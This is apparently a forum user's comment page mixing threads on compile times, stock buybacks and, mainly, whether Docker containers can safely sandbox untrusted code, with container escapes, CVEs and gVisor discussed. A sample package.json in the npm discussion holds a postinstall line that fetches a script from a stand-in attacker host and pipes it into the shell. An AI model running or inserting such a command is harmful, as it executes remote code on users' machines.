petters's comments

I think that bias is due less to the proportion of books and more to how the models are fine-tuned after pretraining.

We identify the real number 2 with the rational number 2 with the integer 2 with the natural number 2. It does not seem so strange to also identify the complex number 2 with those.

If you say "this function f operates on the integers", you can't turn around and then go "ooh but it has solutions in the rationals!" No it doesn't, it doesn't exist in that space.

You can't do this for general functions, but it's fine to do in cases where the definition of f naturally embeds into the rationals. For example, a polynomial over Z is also a polynomial over Q or C.
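A standard worked example of this embedding (my own illustration, not from the thread):

```latex
f(x) = 2x - 1 \in \mathbb{Z}[x] \text{ has no root in } \mathbb{Z};
\qquad
\text{the same } f, \text{ read in } \mathbb{Q}[x], \text{ has the root } x = \tfrac{1}{2}.
```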

> C++ doesn't take longer to compile if you don't abuse templates.

Surprisingly, this is not true. I've written a C++ file only to realize at the end that I did not use any C++ features. Renaming the file to .c halved the compilation time.


I don't believe you. I've measured compile times in C compilers, including my own. If you provide more information, I'd be more inclined to believe you.

On some compiler toolchains (IIRC MSVC was the main offender) you get a lot more code pulled into your source file when including a C stdlib header (like <stdio.h>) in C++ mode versus C mode. Basically a couple hundred lines in C mode versus thousands of lines in C++ mode.

That's fair. I'm unable to provide more information though so we'll have to disagree.



I agree it shouldn't really matter if there's no C++ features in play, but I suppose third party headers could bite you if they use #ifdef __cplusplus to guard optional C++ extensions on top of their basic C interface. In that case the compiler could be dealing with dramatically more complex code when you build in C++ mode.

Maybe it is similar for the same compiler (but one should check; I suspect C could still be faster), but then there are many more C compilers. For example, TCC is a lot faster than GCC.

The question is the performance optimisations on top.

1990s compilers were also super fast; they only did optimisation for size, speed, constant propagation, and little else.

Zero code motion, loop unrolling, code elision, heap-to-stack replacement, inlining, ...


Of course, but gcc with -O0 is still slower and there is no TCC for C++.

There are other C++ compilers to benchmark against, using the same common C subset for comparison, though.

Is there still any non-LLVM C++ compiler left besides GCC? LLVM is not exactly known for its speed.

Many embedded vendors still haven't made the jump, and neither has Microsoft.

MSVC?

TCC is 8x faster; "twice as fast" isn't doing it justice.

As for the header thing, that could potentially be true if the compile time was something like 450ms -> 220ms, but why bother saying it when you're only saving a few hundred milliseconds?


Going from 220 to 450 ms would be a disaster in my project. It has many thousands of files. Recompilation of almost everything happens from time to time.

If those made-up numbers were true, they would be very significant and an argument in favor of keeping the code in C


A 200ms difference is like adding or removing 200 lines of implementation, and splitting code out into a separate file can make it slower because of include overhead. You completely made up C being twice as fast as C++.

> We build Claude with Claude.

Yes and it shows. Gemini CLI often hangs and enters infinite loops. I bet the engineers at Google use something else internally.


How could they be? Claude was down

This makes no sense. Buybacks and dividends are how companies give money to investors


> This makes no sense. Buybacks and dividends are how companies give money to investors

Dividends are totally fine (from my perspective), while buybacks are problematic in a world where executives are bonused on share price and earnings per share, both of which can be manipulated by buybacks.

More philosophically, I think that dividends are better for society as they allow investors to realise a stream of value from well run companies rather than needing to sell their share to acquire this value.

This is obviously just my opinion though, I don't know if it matches to what the OP cares about.


> Dividends are totally fine (from my perspective)

FWIW, companies are now opting for buybacks because it is more "tax efficient".

Stockholders have to pay taxes on dividends (immediately) but only pay capital gains on share price increases and only when they sell.


Yeah I know, I just think that's a poor use of tax policy. The only case where buybacks make sense to me is for companies that give employees RSUs, in which case buybacks compensate for the dilution.


Notionally there's not a difference between dividends and buybacks. (That's somebody's theorem... Modigliani maybe?) The fact that our tax laws treat them so differently doesn't make much sense.
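A toy illustration of that equivalence, ignoring taxes (all numbers made up):

```python
# Made-up numbers: a firm worth $5,000 (100 shares at $50) returns
# $1,000 to shareholders either as a dividend or as a buyback.
shares = 100.0
price = 50.0
cash_to_return = 1_000.0

# Dividend: each share receives $10 and the price drops by the payout,
# so per-share wealth (cash + share) is unchanged.
div_per_share = cash_to_return / shares                    # 10.0
wealth_dividend = (price - div_per_share) + div_per_share  # 50.0

# Buyback: the firm repurchases 20 shares at $50. Firm value and share
# count shrink proportionally, so the price is unchanged for holders.
shares_bought = cash_to_return / price                     # 20.0
price_after = (shares * price - cash_to_return) / (shares - shares_bought)
wealth_buyback = price_after                               # 50.0

assert wealth_dividend == wealth_buyback
print(wealth_dividend, wealth_buyback)
```

Taxes are exactly where this symmetry breaks, as the sibling comments note.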


Dividends in effect force you to sell while buybacks redistribute to people who want to sell/realize it. They are also more efficient tax wise.

The only good reason to pay out dividends instead of announcing buybacks is a view that your shares are overpriced. Then you can't buy them back without facing a potential lawsuit (you are making a company buy something you know is overvalued).


Why does it matter if people have to sell their shares to unlock value? Is it just the friction of small orders?

Buybacks for manipulating share prices and earnings per share are indeed silly. But they should also be trivial to compensate for by normalising on market cap instead of a single share.


And the answer to the obvious follow-up question is...?


Milk before cereals


Milk, then cereal, then bowl!


How about a bowl, and then, 30 minutes ~ 1 hour later, milk with cereals?


Maybe it's under NDA :)


42


fries


imbue

Would be great to see this work continued with some training runs


Agreed. But these things have a way of not working out, and in the sadness, one forgets to celebrate the intermediate victories. I wanted to share an intermediate victory before reality crushes the joy.


> But what if you're an environmentally conscious mother who needs to drive the 5 minute walk to your kids' school? Surely, a modern car must be less polluting?

> CO2 emissions/km:

No, you have already compared fuel consumption. This is equivalent.
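The proportionality is easy to check: tailpipe CO2 scales with fuel burned, at roughly 2.31 kg CO2 per litre of petrol, so the constant cancels out when comparing two cars. A sketch with made-up consumption figures:

```python
# ~2.31 kg CO2 is emitted per litre of petrol burned; the exact value
# doesn't affect the comparison, only the absolute numbers.
KG_CO2_PER_LITRE_PETROL = 2.31

def g_co2_per_km(litres_per_100km: float) -> float:
    """Convert fuel consumption to approximate tailpipe CO2 in g/km."""
    return litres_per_100km * KG_CO2_PER_LITRE_PETROL * 1000 / 100

# Hypothetical old vs new car:
print(g_co2_per_km(8.0))  # ~184.8 g/km
print(g_co2_per_km(6.0))  # ~138.6 g/km
```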


> Older alternatives like sandbox-2 exist, but they provide isolation near the OS level, not the language level. At that point we might as well use Docker or VMs.

No, no: Docker is not a sandbox for untrusted code.


What if I told you that, back in the day, we were letting thousands of untrusted, unruly, mischievous people execute arbitrary code on the same machine, and somehow, the world didn't end?

We live in a bizarre world where somehow "you need a hypervisor to be secure" and "to install this random piece of software, run curl | sudo bash" can live next to each other and both be treated seriously.


9 times out of 10 when I see curl | sudo bash mentioned, it's about it being bad, so I don't think that's a good comparison.


It depends on your threat model, but generally speaking I would not trust default container runtimes for a true sandbox.

The kata-containers [1] runtime takes a container and runs it as a virtual host. It works with Docker, podman, k8s, etc.

It's a way to get the convenience of a container, but benefits of a virtual host.

This is not the be-all and end-all (there are more options), but it is a convenient one that is better than typical containers.

[1] - https://katacontainers.io/


I don't think it is generally possible to escape from a Docker container in the default configuration (e.g. `docker run --rm -it alpine:3 sh`) if you have a reasonably up-to-date kernel from your distro. AFAIK a lot of kernel LPEs use features like unprivileged user namespaces and io_uring, which are not available in containers by default, and truly unprivileged kernel LPEs seem to be sufficiently rare.


The kernel policy is that any distro that isn't using a rolling release kernel is unpatched and vulnerable, so "reasonably up-to-date" is going to lean heavily on what you consider "reasonable".

LPEs abound - unprivileged user namespaces were a whole gateway that was closed, io_uring was hot for a while, eBPF is another great target, and I'm sure more will be found every year, as has been the case. Seccomp and unprivileged containers etc. make a huge difference by stomping out a lot of the attack surface; you can decide how comfortable you are with that though.


>The kernel policy is that any distro that isn't using a rolling release kernel is unpatched and vulnerable, so "reasonably up-to-date" is going to lean heavily on what you consider "reasonable".

I would expect major distributions to have embargoed CVE access specifically to prevent this issue.


Nope, that is not the case. For one thing, upstream doesn't issue CVEs and doesn't really care about CVEs or consider them valid. For another, they forbid or severely limit embargos.


You're right, Docker isn't a sandbox for untrusted code. I mentioned it because I've seen teams default to using it for isolating their agents on larger servers. So I made sure to clarify in the article that it's not secure for that purpose.


It depends on the task, and the risk of isolation failure. Docker can be sufficient if inputs are from trusted sources and network egress is reasonably limited.


Show me how you will escape a docker sandbox.


This is a well understood and well documented subject. Do your own research.

Start here to help give you ideas for what to research:

https://linuxsecurity.com/features/what-is-a-container-escap...


This kind of response isn't helpful. He's right to ask about the motivations for the claim that containers in general are "not a sandbox" when the design of containers/namespaces/etc. looks like it should support using these things to make a sandbox. He's right to be confused!

If you look at the interface contract, both containers and VMs ought to be about equally secure! Nobody is an idiot for reading about the two concepts and arriving at this conclusion.

What you should have written is something about your belief that the inter-container, intra-kernel attack surface is larger than the intra-hypervisor, inter-kernel attack surface, and so it's less likely that someone will screw up implementing a hypervisor so as to open a security hole. I wouldn't agree with this position, but it would at least be defensible.

Instead, you pulled out the tired old "educate yourself" trope. You compounded the error with the weaselly "are considered" passive-voice construction that lets you present the superior security of VMs as a law of nature instead of your personal opinion.

In general, there's a lot of alpha in questioning supposedly established "facts" presented this way.


> This is a well understood and well documented subject. Do your own research.

Anything, including the GNU/Linux kernel, can be broken by such security vulnerabilities.

This is not a weakness in the design of containers. `npm install`, on the other hand, is broken by design (due to post-install scripts).


> This is not a weakness in the design of containers.

Partially correct.

Many container escapes are also because the security of the underlying host, container runtime, or container itself was poorly or inconsistently implemented. This creates gaps that allow escapes from the container. There is a much larger potential for mistakes, creating a much larger attack surface. This is in addition to kernel vulnerabilities.

While you can implement effective hardening across all the layers, the potential for misconfiguration is still there, therefore there is still a large attack surface.

While a virtual host can be escaped from, the attack surface is much smaller, leaving less room for potential escapes.

This is why containers are considered riskier for a sandbox than a virtual host. Which one you use, and why, really should depend on your use case and threat model.

Sad to say, a disappointing number of people don't put much hardening into their container environments, including production k8s clusters. So it's much easier to say that a virtual host is better for sandboxing than containers, because that way people are less likely to get it wrong.


> Many container escapes are also because the security of the underlying host, container runtime, or container itself was poorly or inconsistently implemented.

Sure, so running `npm install` inside the container is no worse than `npm install` on my machine. And in most cases, it is much better.


Containers provide more isolation than no containers. That was never in debate in our conversation.


Escaping a properly set up container is a kernel 0day. Due to how large the kernel attack surface is, such 0days are generally believed to exist. Unless you are a high value target, a container sandbox will likely be sufficient for your needs. If cloud service providers discounted this possibility then a 0day could be burned to attack them at scale.

Also, you can use the runsc (gvisor) runtime for docker, if you are careful not to expose vulnerable protocols to the container there will be nothing escaping it with that runtime.
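For reference, wiring runsc into Docker is a small daemon config change (a sketch; the binary path is an assumption, adjust to wherever runsc is installed):

```json
{
  "runtimes": {
    "runsc": {
      "path": "/usr/local/bin/runsc"
    }
  }
}
```

With that in `/etc/docker/daemon.json` and the daemon restarted, `docker run --rm --runtime=runsc alpine:3 sh` runs the container against gVisor's user-space kernel instead of directly against the host kernel.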


You start with the assumption of "properly set up container". Also I believe you are oversimplifying the attack surface.

A container escape can be caused by combinations of breakdowns in several layers:

- Kernel implementation - aka, a bug. It's rare, but it happens

- Kernel compile time options selected - This has become more rare, but it can happen

- Host OS misconfiguration - Can be a contributing factor to enabling escapes

- Container runtime vulnerability - A vulnerability in the runtime itself

- Container runtime misconfiguration - Was the runtime configured properly?

- Individual container runtime misconfiguration - Was the individual container configured to run securely?

- Individual container build - what's in the container, and what can be leveraged to attack the host

- Running container attack surface - What's the running container's attack surface

The last two are included for completeness, but in the case of the original article, running untrusted Python code makes them irrelevant in this circumstance.

My point is that you must consider the system as a whole to assess its overall attack surface and risk of compromise. There is a lot more that can go wrong to enable a container escape than you implied.

There are some people who are knowledgeable enough to ensure their containers are hardened at every level of the attack surface. Even then, how many are diligent enough to maintain that attention to detail every time? How many automate their configurations?

Most default configurations are not hardened as a compromise to enable usability. Most people who build containers do not consider hardening every possible attack surface. Many don't even know the basics. Most companies don't do a good job hardening their shared container environments - often as a compromise to be "faster".

So yeah, a properly set up container is hard to escape.

Not all containers are set up properly - I'd argue most are not.


> Escaping a properly set up container is a kernel 0day.

No it is not. In fact, many of the container escapes we see are because of bugs in the container runtimes themselves, which can be quite different in their various implementations. CVE-2025-31133 was published 2? months ago and had nothing at all to do with the kernel - just like many container escapes don't.


If a runtime is vulnerable then it didn't "set up a container properly".

Containers are a kernel technology for isolating and restricting resources for a process and its descendants. Once set up correctly, any escape is a kernel 0day.

For anyone who wants to understand what a container is I would recommend bubblewrap: https://github.com/containers/bubblewrap This is also what flatpak happens to use.

It should not take long to realize that you can set it up in ways that are secure and ways which allow the process inside to reach out in undesired ways. As runtimes go, it's as simple as it gets.


Note CVE-2025-31133 requires one of: (1) persistent container (2) attacker-controlled image. That means that as long as you always use "docker run" on known images (as opposed to "docker start"), you cannot be exploited via that bug even if the service itself is compromised.

I am not saying that you should never update the OS, but a lot of those container escapes have severe restrictions and may not apply to your specific config.


Note this lists 3 vulnerabilities as an example: CVE-2016-5195 (Dirty COW), CVE-2019-5736 (host runc override) and CVE-2022-0185 (fs_context escape)

Out of those, only the first one is actually exploitable in common setups.

CVE-2019-5736 requires either attacker-controlled image or "docker exec". This is not likely to be the case in the "untrusted python" use case, nor in many docker setups.

CVE-2022-0185 is blocked by seccomp filter in default installs, so as long as you don't give your containers --privileged flags, you are OK. (And if you do give this flag, the escape is trivial without any vulnerabilities)


The burden of proof lies with the person making empirically unfalsifiable claims.


Exploit the Linux kernel underneath it (not the only way, just the obvious one). Docker is a security boundary but it is not suitable for "I'm running arbitrary code".

That is to say, Docker is typically a security win because you get things like seccomp and user/DAC isolation "for free". That's great. That's a win. Typically exploitation requires a way to get execution in the environment plus a privilege escalation. The combination of those two things may be considered sufficient.

It is not sufficient for "I'm explicitly giving an attacker execution rights in this environment" because you remove the cost of "get execution in the environment" and the full burden is on the kernel, which is not very expensive to exploit.


> Exploit the Linux kernel underneath it (not the only way, just the obvious one). Docker is a security boundary but it is not suitable for "I'm running arbitrary code".

Docker is better for running arbitrary code than the direct `npm install <random-package>` that's common these days.

I moved to a Dockerized sandbox[1], and I feel much better now against such malicious packages.

  1 - https://github.com/ashishb/amazing-sandbox


It's better than nothing, obviously. But I don't consider `npm install <random-package>` to be equivalent to "RCE as a service", although it's somewhat close. I definitely wouldn't recommend `npm install <actually a random package>`, even in Docker.

I also implemented `insanitybit/cargo-sandbox` using Docker but that doesn't mean I think `insanitybit/cargo-sandbox` is a sufficient barrier to arbitrary code execution, which is why I also had a hardened `cargo add` that looked for typosquatting of package names, and why I think package manager security in general needs to be improved.

You can and should feel better about running commands like that in a container, as I said - seccomp and DAC are security boundaries. I wouldn't say "you should feel good enough to run an open SSH server and publish it for anyone to use".


> `npm install <random-package>` to be equivalent to "RCE as a service"

It is literally that. When you write "npm install foo", npm will proceed to install the package called "foo" and then run its installation scripts. It's as if you'd run curl | bash. That npm install script can do literally anything your shell in your terminal can do.

It's not "somewhat close" to RCE. It is literally, exactly, fully, completely RCE delivered as a god damn service to which you connect over the internet.
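For anyone unfamiliar with why: npm runs lifecycle scripts declared in the package's own manifest at install time. A hypothetical `package.json` (the name and URL are made up for illustration):

```json
{
  "name": "innocuous-looking-package",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s https://attacker.example/payload.sh | sh"
  }
}
```

`npm install innocuous-looking-package` would run that `postinstall` line with your user's full privileges. `npm install --ignore-scripts` disables lifecycle scripts, at the cost of breaking packages that legitimately need install steps.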


I'm familiar with how build scripts work. As mentioned, I build insanitybit/cargo-sandbox exactly to deal with malicious build scripts.

The reason I consider it different from "I'm opening SSH to the public, anyone can run a shell" is because the attack typically has to either be through a random package, which significantly reduces exposure, or through a compromised package, which requires an additional attack. Basically, somewhere along the way, something else had to go wrong if `npm install <x>` gives an attacker code execution, whereas "I'm giving a shell to the public" involves nothing else going wrong.

Running a command yourself that may include code you don't expect is not, to me, the same as arbitrary code execution. It often implies it but I don't consider those to be identical.

You can disagree with whether or not this meaningfully changes things (I don't feel strongly about it), but then I'd just point to "I don't think it's a sufficient barrier for either threat model but it's still an improvement".

That isn't to downplay the situation at all. Once again,

> that doesn't mean I think `insanitybit/cargo-sandbox` is a sufficient barrier to arbitrary code execution, which is why I also had a hardened `cargo add` that looked for typosquatting of package names, and why I think package manager security in general needs to be improved.


> definitely wouldn't recommend `npm install <actually a random package>`, even in Docker.

That's not the main attack vector. The attack vector is some random dependency that is used by a lot of popular packages, which you `npm install` indirectly.


That doesn't change what I said. It definitely doesn't change what I said about docker as a security boundary.

Again, it's great to run `npm` in a container. I do that too because it's the lowest effort solution I have available.


Docker provides some host isolation which can be used effectively as a sandbox. It's not designed for security (though it does have some reasonable defaults), but it does give you options to layer on security modules like AppArmor and seccomp very easily.

